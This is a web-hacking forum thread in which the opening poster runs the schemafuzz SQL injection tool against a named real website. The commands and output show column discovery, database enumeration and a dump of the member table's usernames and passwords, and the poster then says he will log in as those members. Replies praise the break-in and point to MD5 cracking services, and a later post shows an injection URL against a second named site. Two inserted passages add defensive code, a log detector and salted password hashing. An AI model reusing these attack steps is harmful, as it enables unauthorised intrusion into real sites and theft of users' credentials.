SQLi using Schemafuzz

Forum for discussing everything about web hacking, from footprinting, scanning, gaining access, privilege escalation, exploitation, covering tracks and backdoors through to securing websites

Moderators: Paman, Xshadow, indounderground, NeOS-01

Forum rules
Discuss bugs, penetration, exploitation and techniques for securing websites and web servers. Include a POC here so members can learn from it
anja_indie
Posts: 20
Joined: Thu Jun 19, 2008 1:51 pm

SQLi using Schemafuzz

Post by anja_indie » Sat Jun 13, 2009 1:33 am

It's a malingshit site...

root@bt:/mnt/SuSE/home/biohazards/Desktop# python schemafuzz.py -u http://ccs.my/news.php?id=1561 --findcol

|---------------------------------------------------------------|
| rsauron[@]gmail[dot]com v5.0 |
| 6/2008 schemafuzz.py |
| -MySQL v5+ Information_schema Database Enumeration |
| -MySQL v4+ Data Extractor |
| -MySQL v4+ Table & Column Fuzzer |
| Usage: schemafuzz.py [options] |
| -h help darkc0de.com |
|---------------------------------------------------------------|

[+] URL: http://ccs.my/news.php?id=1561--
[+] Evasion Used: "+" "--"
[+] 06:15:17
[-] Proxy Not Given
[+] Attempting To find the number of columns...
[+] Testing: 0,1,2,3,4,5,
[+] Column Length is: 6
[+] Found null column at column #: 1
[+] SQLi URL: http://ccs.my/news.php?id=1561+AND+1=2+ ... ,2,3,4,5--
[+] darkc0de URL: http://ccs.my/news.php?id=1561+AND+1=2+ ... de,2,3,4,5
[-] Done!

root@bt:/mnt/SuSE/home/biohazards/Desktop# python schemafuzz.py -u http://ccs.my/news.php?id=1561+AND+1=2+ ... de,2,3,4,5 --dbs

[+] URL: http://ccs.my/news.php?id=1561+AND+1=2+ ... ,2,3,4,5--
[+] Evasion Used: "+" "--"
[+] 06:17:31
[-] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: ccs_myccs
User: ccs_myccs@localhost
Version: 5.0.51a-community
[+] Showing all databases current user has access too!
[+] Number of Databases: 2

[0] ccs_myccs
[1] test

[-] 06:17:50
[-] Total URL Requests 4
[-] Done

Don't forget to check schemafuzzlog.txt

root@bt:/mnt/SuSE/home/biohazards/Desktop# python schemafuzz.py -u http://ccs.my/news.php?id=1561+AND+1=2+ ... de,2,3,4,5 --schema -D ccs_myccs

[+] URL: http://ccs.my/news.php?id=1561+AND+1=2+ ... ,2,3,4,5--
[+] Evasion Used: "+" "--"
[+] 06:19:09
[-] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: ccs_myccs
User: ccs_myccs@localhost
Version: 5.0.51a-community
[+] Showing Tables & Columns from database "ccs_myccs"
[+] Number of Tables: 36

[Database]: ccs_myccs
[Table: Columns]

[-] 06:45:44
[-] Total URL Requests 315
[-] Done

Don't forget to check schemafuzzlog.txt

root@bt:/mnt/SuSE/home/biohazards/Desktop# python schemafuzz.py -u http://ccs.my/news.php?id=1561+AND+1=2+ ... de,2,3,4,5 --dump -D ccs_myccs -T member -C id,username,password

[+] URL: http://ccs.my/news.php?id=1561+AND+1=2+ ... ,2,3,4,5--
[+] Evasion Used: "+" "--"
[+] 06:51:41
[-] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: ccs_myccs
User: ccs_myccs@localhost
Version: 5.0.51a-community
[+] Dumping data from database "ccs_myccs" Table "member"
[+] and Column(s) ['id', 'username', 'password']
[+] Number of Rows: 71

[-] 06:55:38
[-] Total URL Requests 73
[-] Done

Don't forget to check schemafuzzlog.txt


Next....
register as a member...
(because the login page for members is hidden)
then log in as a member whose username and password we already obtained...
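
The run in this post leaves a recognisable trail in the web server's access log: the id parameter carries AND 1=2, a trailing -- comment and information_schema lookups, repeated many times (315 requests for the schema step alone). A detection sketch, added here as an example and not part of the original post; the log lines, paths and IP addresses are constructed, and the pattern list and threshold are assumptions.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qsl

# Constructed access-log lines; addresses come from documentation ranges.
SAMPLE_LOG = '''\
198.51.100.7 - - [01/Jan/2024:10:00:01 +0000] "GET /item.php?id=7 HTTP/1.1" 200 5120
198.51.100.7 - - [01/Jan/2024:10:00:05 +0000] "GET /search.php?q=union+square+hotel HTTP/1.1" 200 2210
203.0.113.9 - - [01/Jan/2024:10:00:07 +0000] "GET /item.php?id=7+AND+1=2+UNION+SELECT+0,1-- HTTP/1.1" 200 812
203.0.113.9 - - [01/Jan/2024:10:00:08 +0000] "GET /item.php?id=7+AND+1=2+UNION+SELECT+0,1,2-- HTTP/1.1" 200 812
203.0.113.9 - - [01/Jan/2024:10:00:09 +0000] "GET /item.php?id=7%20and%201=2%20union%20select%200,1,2/* HTTP/1.1" 200 812
203.0.113.9 - - [01/Jan/2024:10:00:11 +0000] "GET /item.php?id=7+AND+1=2+UNION+SELECT+1+FROM+information_schema.tables-- HTTP/1.1" 200 990
'''

# client address, request target, status code
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3})')

# Markers visible in the tool output: UNION SELECT probing, the always-false
# AND 1=2 prefix, information_schema enumeration, a trailing -- or /* comment.
SQLI = re.compile(
    r"\bunion\b.+\bselect\b|\band\s+1\s*=\s*2\b|information_schema|(?:--|/\*)\s*$",
    re.IGNORECASE,
)

def suspicious_values(target):
    """Return (name, decoded value) for each query parameter matching SQLI."""
    query = urlsplit(target).query
    # parse_qsl decodes both '+' and %xx, so the two evasion spellings match alike.
    return [(name, value)
            for name, value in parse_qsl(query, keep_blank_values=True)
            if SQLI.search(value)]

def scan(log_text, threshold=3):
    """Map each client to its count of flagged requests, if >= threshold."""
    per_client = Counter()
    for line in log_text.splitlines():
        m = LINE.match(line)
        if m and suspicious_values(m.group(2)):
            per_client[m.group(1)] += 1
    return {ip: n for ip, n in per_client.items() if n >= threshold}

if __name__ == "__main__":
    for ip, count in scan(SAMPLE_LOG).items():
        print(f"{ip}: {count} requests with SQL injection markers")
```

Matching on the decoded parameter value rather than the raw URL keeps ordinary words such as "union" in a search term from raising an alert on their own.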

Bi4kKob4r
Posts: 254
Joined: Sat Jul 21, 2007 11:45 am
Location: Bi4kKob4r~root : ls..

Re: SQLi using Schemafuzz

Post by Bi4kKob4r » Sat Jun 13, 2009 1:49 am

hmm... nice show up :D
I think just : Make better than the best

Life is Love,
Love is Feeling,
Feeling is your heart,
Heart Controlling By your brain.

Always INject your brain with the greatest knowledges.

bernadsatriani
Posts: 71
Joined: Sat Jan 17, 2009 5:23 am
Location: localhost

Re: SQLi using Schemafuzz

Post by bernadsatriani » Sat Jun 13, 2009 10:40 am

Whoa...
dumping the user DB :D

N4ck0
Posts: 65
Joined: Tue Mar 03, 2009 9:57 pm
Location: Under

Re: SQLi using Schemafuzz

Post by N4ck0 » Sat Jun 13, 2009 10:46 am

nice bro
so that site isn't MD5-encrypted, right
well, the new schemafuzz from darkc0de
can crack the hash directly

ji_bog
Posts: 19
Joined: Sat May 27, 2006 12:22 am
Location: lagi pengen sendiri..

Re: SQLi using Schemafuzz

Post by ji_bog » Sat Jun 13, 2009 10:17 pm

Thanks, master, for sharing ;)
because I've never used anything like this before hehehe ;)
once again, thanks for sharing 8)
I'll just leave my signature like this :D

th3r00t
Posts: 20
Joined: Sat Jun 13, 2009 12:27 pm
Location: Bandung, Jawa Barat

Re: SQLi using Schemafuzz

Post by th3r00t » Mon Jun 15, 2009 4:54 pm

Whoa, that's not encrypted :D
that site is really bad :lol:
Greetings from a newbie,
www.c0mrade.co.cc | www.c0mr4d3.uni.cc

wiLMaR_kiDz
Posts: 964
Joined: Fri Mar 27, 2009 1:03 pm
Location: internet

Re: SQLi using Schemafuzz

Post by wiLMaR_kiDz » Mon Jun 15, 2009 6:05 pm

Wow... crazy... awesome...
not MD5-encrypted... that's bad.... ;) ;)
regards,
ordinary user,-

bernadsatriani
Posts: 71
Joined: Sat Jan 17, 2009 5:23 am
Location: localhost

Re: SQLi using Schemafuzz

Post by bernadsatriani » Wed Jun 17, 2009 1:26 pm

wkekekeke

anja_indie
Posts: 20
Joined: Thu Jun 19, 2008 1:51 pm

Re: SQLi using Schemafuzz

Post by anja_indie » Wed Jun 17, 2009 5:27 pm

If it were MD5-encrypted.. you'd just decrypt it...
there's fastcrack or online MD5 decryptors, after all.....

he...he..
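
On the storage side of this thread (passwords kept in plaintext, and unsalted MD5 being reversible through lookup services), an added example that is not from the thread or from the site's code: per-user salted PBKDF2 hashing with constant-time verification, plus a migration of plaintext rows. The record format, iteration count and sample passwords are assumptions.

```python
import hashlib
import hmac
import os

ITERATIONS = 600_000  # assumed work factor for PBKDF2-HMAC-SHA256

def md5_unsalted(password):
    # Unsalted MD5: identical passwords give identical digests for every user
    # and every site, which is why precomputed lookup services can reverse them.
    return hashlib.md5(password.encode()).hexdigest()

def hash_password(password, salt=None):
    # A fresh random salt per user makes every stored record unique.
    salt = salt if salt is not None else os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return "pbkdf2_sha256$%d$%s$%s" % (ITERATIONS, salt.hex(), dk.hex())

def verify_password(password, stored):
    try:
        scheme, iters, salt_hex, dk_hex = stored.split("$")
        if scheme != "pbkdf2_sha256":
            return False
        expected = bytes.fromhex(dk_hex)
        dk = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                 bytes.fromhex(salt_hex), int(iters))
    except ValueError:
        return False  # malformed record: fail closed
    # Constant-time comparison avoids leaking how many bytes matched.
    return hmac.compare_digest(dk, expected)

def migrate_plaintext(rows):
    # rows: (user_id, plaintext_password) pairs read from the old column.
    return [(uid, hash_password(pw)) for uid, pw in rows]

if __name__ == "__main__":
    # Constructed rows: two accounts share one password.
    rows = [(1, "constructed-pw-1"), (2, "constructed-pw-1")]
    print("MD5 digests equal:", md5_unsalted(rows[0][1]) == md5_unsalted(rows[1][1]))
    migrated = migrate_plaintext(rows)
    print("salted records equal:", migrated[0][1] == migrated[1][1])
    print("login still works:", verify_password("constructed-pw-1", migrated[0][1]))
```

Hashing limits what a dumped table reveals; the injection itself is closed by binding the id parameter in a prepared statement instead of concatenating it into the query.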

shad.hckr
Posts: 555
Joined: Mon Sep 29, 2008 4:48 am
Location: /home/sh4dhckr

Re: SQLi using Schemafuzz

Post by shad.hckr » Fri Jun 19, 2009 9:48 pm

[+] Gathering MySQL Server Configuration...
Database: ukcds
User: ukcds@localhost
Version: 5.0.22-Debian_0ubuntu6.06.2-log
[+] Starting current users database extraction...

[Database]: ukcds

[Table: Columns]

[-] Done
Don't forget to check database.txt

http://www.ukcds.org.uk/pages.php?page= ... rom+users/*
